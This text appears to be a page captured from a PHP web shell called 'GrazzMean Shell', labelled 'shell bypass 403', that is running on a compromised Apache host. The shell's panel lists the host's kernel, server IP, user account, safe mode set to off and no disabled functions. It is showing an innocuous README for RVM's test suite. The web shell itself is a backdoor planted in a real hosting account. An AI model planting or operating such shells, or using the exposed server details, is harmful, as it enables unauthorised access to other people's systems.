shell bypass 403

GrazzMean Shell

Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.147.71.58
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : README.md
# RVM - Tests

Set of tests for [RVM](https://github.com/wayneeseguin/rvm/).

## Usage

    $ gem install tf    # Install testing framework
    $ tf fast/*         # Run the short tests (those are run on travis)
    $ tf long/*         # Run the long set of tests, like installing rubies.
    $ tf --text long/*  # Same as above, but watch output

## Comment tests

Filenames have to end with `_comment_test.sh`

Example test file:

    ## User comments start with double #
    ## command can be writen in one line with multiple tests:
    true # status=0; match=/^$/
    ## or tests can be placed in following lines:
    false
    # status=1
© 2025 GrazzMean